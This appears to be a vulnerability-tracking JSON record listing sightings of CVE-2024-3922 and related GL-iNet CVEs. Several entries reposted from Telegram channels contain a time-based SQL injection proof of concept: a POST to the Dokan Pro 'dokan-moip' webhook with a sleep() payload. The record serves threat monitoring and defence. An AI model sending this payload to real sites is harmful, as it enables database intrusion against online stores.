{"vulnerability": "cve-2024-3922", "sightings": [{"uuid": "bb7c60bb-72f1-46e9-872b-86aeb3154c84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-39226", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114490845618304857", "content": "", "creation_timestamp": "2025-05-11T19:27:43.609779Z"}, {"uuid": "dc076036-2967-40f1-87a0-f83e5b45940e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3922", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/11166", "content": "Dokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit  #poc", "creation_timestamp": "2024-07-05T05:17:28.000000Z"}, {"uuid": "6971f76a-e4d1-4797-9eb0-89c4762797b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-39227", "type": "seen", "source": "https://t.me/cvedetector/2623", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39227 - GL-iNet Router Shell Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39227 \nPublished : Aug. 6, 2024, 5:15 p.m. | 36\u00a0minutes ago \nDescription : GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a shell injection vulnerability via the interface check_ovpn_client_config. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-06T20:02:43.000000Z"}, {"uuid": "18e8d46a-3293-4fce-b896-b42346e4eab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-39229", "type": "seen", "source": "https://t.me/cvedetector/2620", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39229 - GL-iNet DNS Rebinding Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39229 \nPublished : Aug. 6, 2024, 5:15 p.m. | 36\u00a0minutes ago \nDescription : An issue in GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, XE3000/X3000 v4, and B2200/MV1000/MV1000W/USB150/N300/SF1200 v3.216 allows attackers to intercept communications via a man-in-the-middle attack when DDNS clients are reporting data to the server. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-06T20:02:40.000000Z"}, {"uuid": "e93d0f46-9b7b-4d4a-98cf-2dd2af90538d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3922", "type": "exploited", "source": "Telegram/pkydkwnmzDPXwvLoeDS_lr1nvikknfAe2bWtgf1Cx7pI61Uq", "content": "", "creation_timestamp": "2024-07-05T05:08:15.000000Z"}, {"uuid": "581382ab-4c3e-4896-a6c0-df076170bf04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3922", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1143", "content": "Dokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit  #poc", "creation_timestamp": "2024-07-05T05:17:28.000000Z"}, {"uuid": "f3998459-8547-4cfe-8f42-fd25eb23d2c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3922", "type": "exploited", "source": "https://t.me/CNArsenal/2746", "content": "Dokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit  #poc", "creation_timestamp": "2024-07-14T00:20:28.000000Z"}, {"uuid": "afeabcad-fdc5-4fda-8fc7-0b3f03c22382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3922", "type": "seen", "source": "https://t.me/kasraone_com/724", "content": "\ud83d\udd34 CVE\n\nDokan Pro SQL-CVE-2024-3922\n\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: 127.0.0.1\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n\n#exploit\n\n\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0 \u2661 \u2800\u2800 \u3007\u2800\u00a0 \u2800 \u2399\u2800\u200c\u00a0 \u200c \u2332\u2063 \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u02e1\u2071\u1d4f\u1d49\u00a0 \u1d9c\u1d52\u1d50\u1d50\u1d49\u207f\u1d57\u00a0\u00a0 \u02e2\u1d43\u1d5b\u1d49\u00a0 \u02e2\u02b0\u1d43\u02b3\u1d49\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 K1\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 kasraone", "creation_timestamp": "2024-12-27T05:47:49.000000Z"}]}